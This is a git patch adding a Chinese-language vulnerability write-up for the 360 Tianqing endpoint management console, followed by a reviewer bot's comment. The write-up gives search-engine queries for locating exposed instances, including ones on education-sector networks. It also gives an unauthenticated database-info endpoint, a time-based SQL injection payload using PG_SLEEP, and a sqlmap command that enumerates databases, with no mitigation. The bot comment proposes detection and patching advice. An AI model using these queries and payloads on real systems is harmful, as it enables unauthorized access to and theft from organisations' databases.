From 80bc9aeea9f05724cdf13d24e50d4410ffddad1f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 18 Oct 2023 18:38:23 +0800
Subject: [PATCH] =?UTF-8?q?Create=20360=E5=A4=A9=E6=93=8E=20-=20=E6=9C=AA?= =?UTF-8?q?=E6=8E=88=E6=9D=83=E4=B8=8Esql=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
360天擎 - 未授权与sql注入.md | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 360天擎 - 未授权与sql注入.md
diff --git a/360天擎 - 未授权与sql注入.md b/360天擎 - 未授权与sql注入.md
new file mode 100644
index 0000000..7794664
--- /dev/null
+++ b/360天擎 - 未授权与sql注入.md
@@ -0,0 +1,24 @@
+## 360天擎 - 未授权与sql注入
+
+## FOFA语法
+```title="360新天擎"```
+
+
+## 鹰图
+```web.title="360新天擎"&& ip.isp="教育"```
+
+## 漏洞复现
+
+### 未授权漏洞
+```路由后拼接/api/dbstat/gettablessize```
+
+
+### sql注入漏洞
+比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入
+```
+路由后拼接/api/dp/rptsvcsyncpoint?ccid=1
+
+{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
+```
+## sqlmap
+python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1
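Review bot: The added write-up ends at the `## sqlmap` section without naming affected versions, a fixed build or any mitigation, so a reader cannot tell whether a given console is exposed or how to close the issue. I would add a closing section such as `## Detection and mitigation` with `- Review access logs for unauthenticated requests to /api/dbstat/gettablessize, and for /api/dp/rptsvcsyncpoint where ccid is not a plain integer` and `- Restrict the console to management networks and install the vendor's fixed build (<fixed version: not stated on this page>)`. The `PG_SLEEP` probe after a `;` suggests a PostgreSQL backend that accepts stacked statements, so the impact is probably wider than data disclosure and is worth stating in the text; that is inferred from the payload shown, not confirmed on this page.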